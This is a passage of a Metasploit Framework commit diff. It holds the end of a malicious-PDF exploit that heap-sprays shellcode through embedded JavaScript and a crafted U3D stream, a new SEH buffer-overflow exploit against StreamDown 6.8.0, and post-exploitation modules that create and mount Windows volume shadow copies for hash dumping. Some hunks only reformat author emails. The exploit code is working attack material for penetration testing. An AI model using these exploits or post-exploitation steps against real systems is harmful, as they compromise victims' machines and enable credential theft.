function alloc(bytes) {
return padding.substr(0, (bytes - 6) / 2);
}
function spray_eip(esc_a) {
pointers_a = unescape(esc_a);
for (i = 0; i < 2000; i++) {
x[i] = alloc(0x8) + pointers_a;
y[i] = alloc(0x88) + pointers_a;
y[i] = alloc(0x88) + pointers_a;
y[i] = alloc(0x88) + pointers_a;
}
};
function spray_shellcode() {
bbb = unescape('#{escaped_payload}');
ccc = unescape("%u0c0c");
ccc += ccc;
while (ccc.length + 20 + 8 < (0x8000 + 0x8000)) ccc += ccc;
i1 = 0x0c0c - 0x24;
ddd = ccc.substring(0, i1 / 2);
ddd += bbb;
ddd += ccc;
i2 = 0x4000 + 0xc000;
eee = ddd.substring(0, i2 / 2);
for (; eee.length < 0x40000 + 0x40000;) eee += eee;
i3 = (0x1020 - 0x08) / 2;
fff = eee.substring(0, 0x80000 - i3);
ggg = new Array();
for (hhh = 0; hhh < 0x1e0 + 0x10; hhh++) ggg[hhh] = fff + "s";
}
padding = unescape("#{escaped_eip}");
while (padding.length < 0x10000)
padding = padding + padding;
spray_shellcode();
spray_eip('%u4141');
this.pageNum = 2;
JS
js = js.gsub(/^\t\t/,'')
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
u3d = make_u3d_stream
xml = make_xml_data
pdf = make_pdf(u3d, xml, js.to_s)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
def make_xml_data
xml = %Q|<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<ed>kapa</ed>
<config xmclns="http://www.microsoft.org/schema/xci/2.6/">
<present>
<pdf>
<version>1</version>
<fjdklsajfodpsajfopjdsio>f</fjdklsajfodpsajfopjdsio>
<interactive>1</interactive>
</pdf>
</present>
</config>
<template xmdfaflns="http://www.microsoft.org/schema/xffdsa-template/2f/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet>
</pageSet>
</subform>
</template>
<template1 xmdfaflns="http://www.microsoft.org/schema/xffdsa-template/2f/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet>
</pageSet>
</subform>
</template1>
<template2 xmdfaflns="http://www.microsoft.org/schema/xffdsa-template/2f/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet>
</pageSet>
</subform>
</template2>
</xdp:xdp>|
xml = xml.gsub(/^\t\t/, '')
return xml
end
def u3d_pad(str, char="\x00")
len = str.length % 4
if (len > 0)
#puts "Adding %d pad bytes" % (4 - len)
return (char * (4 - len))
end
""
end
def u3d_string(str)
([str.length].pack('v') + str)
end
def make_u3d_stream()
#
# REFERENCE:
# http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-363%201st%20edition.pdf
# The File format consists of these blocks:
# [File Header Block][Declaration Block][Continuation Block]
# Each block consists of (padding is used to keep fields 32-bit aligned):
# [Block Type][Data Size][Metadata Size][Data][Data Padding][Meta Data][Meta Data Padding]
#
mc_name = u3d_string("CCCCBox01")
mr_name = u3d_string("Box01RX")
# build the U3D header (length will be patched in later)
hdr_data = [0,0].pack('n*') # version info
hdr_data << [0,0x24,0xa34,0,0x6a].pack('VVVVV') # 31337 was 0xa34
hdr = "U3D\x00"
hdr << [hdr_data.length,0].pack('VV')
hdr << hdr_data
parent_node_data =
"\x01\x00\x00\x00"+ # node count (1)
"\x00\x00"+ # name (empty)
# transform matrix
[0x813f,0,0,0,0,0x813f,0,0,0,0,0x813f,0,0x548a55c0,0xa2027cc2,0,0x813f].pack('N*')
model_node_data = ""
model_node_data << mc_name
model_node_data << parent_node_data
model_node_data << mr_name
model_node_data << [1].pack('V') # Model Visibility (Front visible)
model_node = [0xffffff22,model_node_data.length,0].pack('VVV')
#model_node = [0xffffff22,0x5e,0].pack('VVV')
model_node << model_node_data
bone_weight_data = ""
bone_weight_data << mc_name
bone_weight_data << [
1, # Chain index
1, # Bone Weight Attributes (for a mesh)
0x3162123b, # Inverse Quant
0x14, # Position Count
].pack('VVNV')
# Position List
bone_weight_data << [
# 1
1, # Bone Weight Count
3, # Bone Index (no Quantized Weight)
# 2
0x55550000, # Bone Weight Count
0x4c1df36e, # Bone Index
0x0200d002, # Quantized Weight
# 3
0x95000074, # Bone Weight Count
0x66ccc357, # Bone Index
0x00000000 # Quantized Weight
].pack('VVNNNNNN')
bone_weight = [0xffffff44,0x3a,0].pack('VVV')
# We hardcode the length to match the old file.. (TODO: test if necessary)
#bone_weight = [0xffffff44,bone_weight_data.length,0].pack('VVV')
bone_weight << bone_weight_data
new_objtype1_data =
"\x05\x00\x52\x52\x52\x52\x52\x01\x00\x00\x00\xa6\x04\xa8\x96\xb9\x3f\xc5\x43\xb2\xdf\x2a"+
"\x31\xb5\x56\x93\x40\x00\x01\x00\x00\x00\x00\x00\x00\x05\x00\x52\x52\x52\x52\x52\x01\x00"+
"\x00\x00\x01\x00\x2e\x01\x00\x76\x00\x00\x00\x00"
#new_objtype1 = [0xffffff16,0x38,0].pack('VVV')
new_objtype1 = [0xffffff16,new_objtype1_data.length,0].pack('VVV')
new_objtype1 << new_objtype1_data
shading_modifier_data = ""
shading_modifier_data << mc_name
shading_modifier_data <<
"\x02\x00\x00\x00\x00\x00\x00\x00\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x06\x00\x42\x6f\x02\x00\x00\x00"
#shading_modifier = [0xffffff45,0x23,0].pack('VVV')
shading_modifier = [0xffffff45,shading_modifier_data.length,0].pack('VVV')
shading_modifier << shading_modifier_data
new_objtype2_data =
"\x01\x00\x52\x01\x00\x00\x00\xa6\x04\xa8\x96\xb9\x3f\xc5\x43\xb2"+
"\xdf\x2a\x31\xb5\x56\x93\x40\x00\x01\x00\x00\x00\x00\x00\x00\x01\x00\x52\x01\x00\x00\x00"+
"\x01\x00\x2e\x01\x00\x76\x00\x00\x00\x00"
#new_objtype2 = [0xffffff16,0x30,0].pack('VVV')
new_objtype2 = [0xffffff16,new_objtype2_data.length,0].pack('VVV')
new_objtype2 << new_objtype2_data
nodemod_decl = ""
nodemod_decl << model_node
nodemod_decl << u3d_pad(nodemod_decl)
nodemod_decl << bone_weight
nodemod_decl << u3d_pad(nodemod_decl)
nodemod_decl << new_objtype1
nodemod_decl << u3d_pad(nodemod_decl)
nodemod_decl << shading_modifier
nodemod_decl << u3d_pad(nodemod_decl)
nodemod_decl << new_objtype2
nodemod_decl << u3d_pad(nodemod_decl)
nodemod_decl <<
# another modifier chain?
"\x14\xff\xff\xff\xc0\x01\x00\x00\x00\x00\x00\x00"+
"\x07\x00\x42\x6f\x78\x30\x31\x52\x58\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00"+
"\x00\x00"+
# clod mesh generator (declaration)
"\x31\xff\xff\xff\x9b\x01\x00\x00\x00\x00\x00\x00\x07\x00\x42\x6f\x78\x30\x31\x52"+
"\x58\x00\x00\x00\x00\x00\x00\x00\x00\x24\x00\x00\x00\x14\x00\x00\x00\x6c\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x2c\x01\x00\x00\x2c\x01\x00\x00\x2c"+
"\x01\x00\x00\x87\x52\x0a\x3d\xa6\x05\x6f\x3b\xa6\x05\x6f\x3b\x4a\xf5\x2d\x3c\x4a\xf5\x2d"+
"\x3c\x66\x66\x66\x3f\x00\x00\x00\x3f\xf6\x28\x7c\x3f\x04\x00\x00\x00\x07\x00\x53\x63\x61"+
"\x70\x75\x6c\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x07\x00\x48\x75\x6d\x65\x72\x75\x73\x07\x00\x53\x63\x61\x70\x75\x6c\x61\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x55\x6c\x6e\x61\x07\x00\x48\x75"+
"\x6d\x65\x72\x75\x73\x00\x00\x00\x00\x00\x00\x20\x41\x00\x00\x00\x00\x00\x00\x20\x41\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06"+
"\x00\x52\x61\x64\x69\x75\x73\x04\x00\x55\x6c\x6e\x61\x00\x00\x00\x00\x00\x00\x70\x41\x00"+
"\x00\x00\x00\x00\x00\x70\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
# clod mesh generator (progressive mesh cont)
"\x3c\xff\xff\xff\x6f\x01\x00\x00\x00\x00\x00\x00\x07\x00"+
"\x42\x6f\x78\x30\x31\x52\x58\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x00\x00\x00\x50\x02\x00\x00\x28\x01"+
"\x00\x00\x7f\x75\x2f\x2b\x00\x00\x20\x73\x00\x00\xc3\x05\x00\x00\x00\x00\x00\x00\x80\x02"+
"\x45\xe4\x4c\x55\x01\x00\x00\xe0\x30\x03\x00\x00\xb0\x01\x00\x00\x00\x36\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x55\x55\x05\x00\x80\xa3\x2a\x00\xc0\xe1"+
"\x41\x6b\x92\xf2\xa4\x00\x00\x72\x87\x18\x4c\xd0\xda\x00\x00\x20\x46\xa9\x03\x00\x40\x8c"+
"\x00\x00\xa0\x7c\xa9\xa7\x10\x03\x00\x00\xc4\x09\x00\x00\x0d\xd2\x50\x85\x03\x72\x00\x80"+
"\x5c\x37\x19\xc1\xb9\x0f\x00\x20\x55\xf7\x13\x00\x40\x00\xdc\x1f\xf9\x2c\x35\x30\x6e\x06"+
"\x62\xb6\xea\x09\x2e\x7b\x28\xa4\x90\xe0\xb3\x63\x2c\x20\x92\x2a\x88\xbc\x06\x3a\xff\x80"+
"\x43\xb2\x00\x00\x00\x14\x62\x0e\x63\xb4\x04\x08\x47\x52\x20\x31\xca\x00\x00\xb4\x21\xe0"+
"\xd7\x01\x00\xa0\x1a\x72\x11\x71\xc2\x2c\x74\xc1\xa3\x56\xfa\x30\x03\x00\xe0\x7b\xd0\x62"+
"\x2a\x00\x40\x71\xfa\x6c\xc6\xcf\x07\x78\x81\xd0\x47\x3d\x58\x0e\x51\x0f\x2e\x27\x2d\xbe"+
"\x26\x10\x06\x6f\x3a\x40\xae\x36\x6a\x43\x60\xdf\xcb\xef\x8c\x38\xca\x04\x92\x79\x4b\x79"+
"\xe9\x42\xbd\x2b\xb9\x5b\x86\x60\x65\xa4\x75\x01\x19\xda\xcf\x6a\xf7\x2a\x77\x3c\xde\xf1"+
"\x11\x75\x33\xd3\x94\x74\x4a\x14\x73\x4b\x18\xa1\x66\xc2\x0f\xde\x3d\xed\x19\xd4\x32\x2e"+
"\xb6\x11\xf2\xc6\x2f\x13\x62\xb9\xe5\xe1\x03\x8b\xb5\x1c\x23\x9f\x80\x03\x75\xb6\x26\xd3"+
"\x1c\x16\x5f\x9b\x3c\xea\x62\x10\xe1\xb1\x00\x00\x00\x00"
# build the modifier chain
chain_data = ""
chain_data << mc_name
chain_data << [0].pack('V') # type (node modifier)
chain_data << [0].pack('V') # attributes (no bounding info)
chain_data << u3d_pad(chain_data)
chain_data << [0x5].pack('V') # number of modifiers
chain_data << nodemod_decl
#modifier_chain = [0xffffff14,chain_data.length,0].pack('VVV') # chain_data was 0x17c bytes
modifier_chain = [0xffffff14,0x17c,0].pack('VVV')
modifier_chain << chain_data
data = ""
data << hdr
data << modifier_chain
data
end
def RandomNonASCIIString(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def ioDef(id)
"%d 0 obj\n" % id
end
def ioRef(id)
"%d 0 R" % id
end
def ASCIIHexWhitespaceEncode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(u3d_stream, xml, js_doc)
xref = []
eol = "\x0a"
obj_end = "" << eol << "endobj" << eol
# the header
pdf = "%PDF-1.7" << eol
# filename/comment
pdf << "%" << RandomNonASCIIString(4) << eol
email = rand_text_alpha(3) + "@" + rand_text_alpha(4) + ".com"
site = rand_text_alpha(5) + ".com"
xref << pdf.length
pdf << ioDef(1)
pdf << "<</Author (Fo)/email (#{email})/web (site)>>"
pdf << obj_end
compressed_xml = Zlib::Deflate.deflate(xml)
xref << pdf.length
pdf << ioDef(2)
pdf << "<</Length " << compressed_xml.length.to_s << " /Filter /FlateDecode>>" << eol
pdf << "stream" << eol
pdf << compressed_xml << eol
pdf << "endstream"
pdf << obj_end
xref << pdf.length
pdf << ioDef(3)
pdf << "<</XFA " << ioRef(2) << ">>"
pdf << obj_end
xref << pdf.length
pdf << ioDef(4)
pdf << "<</Type/Catalog/Outlines " << ioRef(5)
pdf << " /Pages " << ioRef(6)
pdf << " /OpenAction " << ioRef(14)
pdf << " /AcroForm " << ioRef(3)
pdf << ">>"
pdf << obj_end
xref << pdf.length
pdf << ioDef(5) << "<</Type/Outlines/Count 0>>"
pdf << obj_end
xref << pdf.length
pdf << ioDef(6)
pdf << "<</Type/Pages/Count 3/Kids [%s %s %s]>>" % [ioRef(13), ioRef(9), ioRef(12)]
pdf << obj_end
data = "\x78\xda\xd3\x70\x4c\x04\x02\x4d\x85\x90\x2c\x00\x0f\xd3\x02\xf5"
compressed_data = Zlib::Deflate.deflate(data)
xref << pdf.length
pdf << ioDef(7)
pdf << "<</Length %s /Filter /FlateDecode>>" %compressed_data.length.to_s << eol
pdf << "stream" << eol
pdf << compressed_data << eol
pdf << "endstream"
pdf << obj_end
xref << pdf.length
pdf << ioDef(8)
pdf << "<</ProcSet [/PDF]>>"
pdf << obj_end
xref << pdf.length
pdf << ioDef(9)
pdf << "<</Type/Page/Parent %s/MediaBox [0 0 640 480]/Contents %s/Resources %s>>" % [ioRef(6), ioRef(7), ioRef(8)]
pdf << obj_end
compressed_u3d = Zlib::Deflate::deflate(u3d_stream)
xref << pdf.length
pdf << ioDef(10)
pdf << "<</Type/3D/Subtype/U3D/Length %s /Filter/FlateDecode>>" %compressed_u3d.length.to_s << eol
pdf << "stream" << eol
pdf << compressed_u3d << eol
pdf << "endstream"
pdf << obj_end
xref << pdf.length
pdf << ioDef(11)
pdf << "<</Type/Annot/Subtype/3D/Contents (#{rand_text_alpha(4)})/3DI false/3DA <</A/PO/DIS/I>>"
pdf << "/Rect [0 0 640 480]/3DD %s /F 7>>" %ioRef(10)
pdf << obj_end
xref << pdf.length
pdf << ioDef(12)
pdf << "<</Type/Page/Parent %s /MediaBox [0 0 640 480]/Contents %s /Resources %s /Annots [%s]>>" % [ioRef(6), ioRef(7), ioRef(8), ioRef(11)]
pdf << obj_end
xref << pdf.length
pdf << ioDef(13)
pdf << "<</Type/Page/Parent %s /MediaBox [0 0 640 480]/Contents %s /Resources %s>>" % [ioRef(6), ioRef(7), ioRef(8)]
pdf << obj_end
xref << pdf.length
pdf << ioDef(14)
pdf << "<</S/JavaScript/JS %s>>" %ioRef(15)
pdf << obj_end
compressed_js = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_doc))
xref << pdf.length
pdf << ioDef(15)
pdf << "<</Length " << compressed_js.length.to_s << " /Filter [/FlateDecode/ASCIIHexDecode]>>"
pdf << "stream" << eol
pdf << compressed_js << eol
pdf << "endstream"
pdf << obj_end
# xrefs
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
# trailer
pdf << "trailer" << eol
pdf << "<</Size %d/Root " % (xref.length + 1) << ioRef(4) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
end
end

2
modules/exploits/windows/fileformat/aol_desktop_linktag.rb
View File

@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'sup3r', #Initial disclosure, poc (9.5)
'sickn3ss', #9.6 poc
'sinn3r', #Metasploit
'mr_me', #NX bypass target
'mr_me <steventhomasseeley[at]gmail.com>', #NX bypass target
'silent_dream', #Win 7 target
],
'References' =>

2
modules/exploits/windows/fileformat/galan_fileformat_bof.rb
View File

@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'Jeremy Brown <0xjbrown41 [at] gmail.com>',
'Jeremy Brown <0xjbrown41[at]gmail.com>',
'loneferret',
],
'Version' => '$Revision$',

4
modules/exploits/windows/fileformat/visiwave_vwr_type.rb
View File

@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me', # original discovery & msf exploit
'TecR0c' # msf exploit
'mr_me <steventhomasseeley[at]gmail.com>', # original discovery & msf exploit
'TecR0c <roccogiovannicalvi[at]gmail.com>' # msf exploit
],
'Version' => '$Revision$',
'References' =>

2
modules/exploits/windows/ftp/easyftp_cwd_fixret.rb
View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' =>
[
'Paul Makowski <my.hndl [at] gmail.com>', # original version
'Paul Makowski <my.hndl[at]gmail.com>', # original version
'jduck' # various fixes, remove most hardcoded addresses
],
'License' => MSF_LICENSE,

77
modules/exploits/windows/misc/stream_down_bof.rb Normal file
View File

@ -0,0 +1,77 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'StreamDown 6.8.0 Buffer overflow',
'Description' => %q{
Stream Down 6.8.0 seh based buffer overflow triggered when processing
the server reponse packet.During the overflow a structured exception
handler is overwritten.
},
'Author' => 'Fady Mohamed Osman <fady.mohamed.osman[at]gmail.com>',
'References' =>
[
['OSVDB', '78043'],
['BID', '51190'],
['URL', 'http://www.dark-masters.tk/'],
['URL', 'http://secunia.com/advisories/47343/'],
['URL', 'http://www.exploit-db.com/exploits/18283/']
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'BadChars' => "\x00\xff\x0a"
},
'Platform' => 'win',
'Targets' =>
[
[
'StreamDown 6.8.0',
{
'Offset' => 16388,
'Ret' => 0x10019448 #POP/POP/RET in DownloadMng.dll
}
],
],
'DefaultTarget' => 0,
'License' => MSF_LICENSE
))
end
def on_request_uri(cli,request)
vprint_status("#{cli.peerhost}:#{cli.peerport} requested: #{request.uri}")
# No point to continue if the client isn't what we interested in
ua = request.headers['User-Agent']
if ua !~ /CoCSoft Stream Download/i
print_error("Target not supported: #{ua}")
send_not_found(cli)
return
end
nseh = "\xeb\x06" + rand_text_alpha(2)
seh = [target.ret].pack('V')
offset_to_nseh = target['Offset']
nops = make_nops(10)
sploit = rand_text_alpha(offset_to_nseh) + nseh + seh + nops + payload.encoded
cli.put(sploit)
close_client(cli)
end
end

11
modules/exploits/windows/oracle/extjob.rb
View File

@ -19,10 +19,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job
Scheduler is implemented via the component extjob.exe which listens on a named pipe
called "orcljsex<SID>" and execute arbitrary commands received throw this channel via
CreateProcess(). In order to connect to the Named Pipe remotely SMB access is required.
This module has been tested on Oracle 10g Release 1 where the Oracle Job Scheduler
runs as SYSTEM on Windows but it's disabled by default.
called "orcljsex<SID>" and execute arbitrary commands received over this channel via
CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required.
Note that the Job Scheduler is disabled in default installations.
},
'Author' =>
[
@ -40,6 +39,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 2048,
},
'Platform' => 'win',
# This module has been tested on Oracle 10g Release 1
# where the Oracle Job Scheduler runs as SYSTEM on Windows
'Targets' => [['Automatic',{}]],
'Privileged' => true,
'DisclosureDate' => 'Jan 01 2007',
@ -193,4 +194,4 @@ From ExecMain():
.text:00401A4B call ds:__imp__CreateProcessA@40 ; CreateProcessA(x,x,x,x,x,x,x,x,x,x)
=end
=end

2
modules/exploits/windows/scada/codesys_web_server.rb
View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'Luigi Auriemma', # Original discovery and poc
'Celil UNUVER',
'TecR0c', # Module Metasploit
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Module Metasploit
'sinn3r'
],
'References' =>

2
modules/payloads/singles/generic/debug_trap.rb
View File

@ -23,7 +23,7 @@ module Metasploit3
'Name' => 'Generic x86 Debug Trap',
'Version' => '$Revision$',
'Description' => 'Generate a debug trap in the target process',
'Author' => 'robert <robertmetasploit [at] gmail.com>',
'Author' => 'robert <robertmetasploit[at]gmail.com>',
'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ],
'License' => MSF_LICENSE,
'Arch' => ARCH_X86,

2
modules/post/windows/gather/enum_devices.rb
View File

@ -29,7 +29,7 @@ class Metasploit3 < Msf::Post
},
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'Author' => [ 'Brandon Perry' ],
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))

2
modules/post/windows/gather/enum_ms_product_keys.rb
View File

@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
'Name' => 'Windows Gather Product Key',
'Description' => %q{ This module will enumerate the OS license key },
'License' => MSF_LICENSE,
'Author' => [ 'Brandon Perry'],
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>'],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]

69
modules/post/windows/manage/vss_create.rb Normal file
View File

@ -0,0 +1,69 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Create Shadow Copy",
'Description' => %q{
This module will attempt to create a new volume shadow copy.
This is based on the VSSOwn Script originally posted by
Tim Tomes and Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com'],
'References' => [
[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]
]
))
register_options(
[
OptString.new('VOLUME', [ true, 'Volume to make a copy of.', 'C:\\'])
], self.class)
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
if is_uac_enabled?
print_error("This module requires UAC to be bypassed first")
return
end
unless start_vss
return
end
id = create_shadowcopy(datastore['VOLUME'])
if id
print_good "Shadow Copy #{id} created!"
end
end
end

83
modules/post/windows/manage/vss_list.rb Normal file
View File

@ -0,0 +1,83 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage List Shadow Copies",
'Description' => %q{
This module will attempt to list any Volume Shadow Copies
on the system. This is based on the VSSOwn Script
originally posted by Tim Tomes and Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com'],
'References' => [
[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]
]
))
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
if is_uac_enabled?
print_error("This module requires UAC to be bypassed first")
return
end
unless start_vss
return
end
list = ""
shadow_copies = vss_list
unless shadow_copies.empty?
shadow_copies.each do |copy|
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Shadow Copy Data',
'Indent' => 1,
'Columns' => ['Field', 'Value']
)
copy.each_pair{|k,v| tbl << [k,v]}
list << " #{tbl.to_s} \n\n"
print_good tbl.to_s
end
store_loot(
'host.shadowcopies',
'text/plain',
session,
list,
'shadowcopies.txt',
'Shadow Copy Info'
)
end
end
end

70
modules/post/windows/manage/vss_mount.rb Normal file
View File

@ -0,0 +1,70 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Mount Shadow Copy",
'Description' => %q{
This module will attempt to mount a Volume Shadow Copy
on the system. This is based on the VSSOwn Script
originally posted by Tim Tomes and Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com'],
'References' => [
[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]
]
))
register_options(
[
OptString.new('DEVICE', [ true, 'DeviceObject of Shadowcopy to mount.' ]),
OptString.new('PATH', [ true, 'Path to mount it to.' ])
], self.class)
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
if is_uac_enabled?
print_error("This module requires UAC to be bypassed first")
return
end
unless start_vss
return
end
r = session.sys.process.execute("cmd.exe /C mklink /D #{datastore['DEVICE']} #{datastore['PATH']}", nil, {'Hidden' => true})
end
end

71
modules/post/windows/manage/vss_set_storage.rb Normal file
View File

@ -0,0 +1,71 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Set Shadow Copy Storage Space",
'Description' => %q{
This module will attempt to change the ammount of space
for volume shadow copy storage. This is based on the
VSSOwn Script originally posted by Tim Tomes and
Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com'],
'References' => [
[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]
]
))
register_options(
[
OptInt.new('SIZE', [ true, 'Size in bytes to set for Max Storage'])
], self.class)
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
if is_uac_enabled?
print_error("This module requires UAC to be bypassed first")
return
end
unless start_vss
return
end
if vss_set_storage(datastore['SIZE'])
print_good("Size upated successfully")
else
print_error("There was a problem updating the storage size")
end
end
end

80
modules/post/windows/manage/vss_storage.rb Normal file
View File

@ -0,0 +1,80 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/shadowcopy'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ShadowCopy
def initialize(info={})
super(update_info(info,
'Name' => "Windows Manage Get Shadow Copy Storage Info",
'Description' => %q{
This module will attempt to get volume shadow copy storage info.
This is based on the VSSOwn Script originally posted by
Tim Tomes and Mark Baggett.
Works on win2k3 and later.
},
'License' => MSF_LICENSE,
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter'],
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com'],
'References' => [
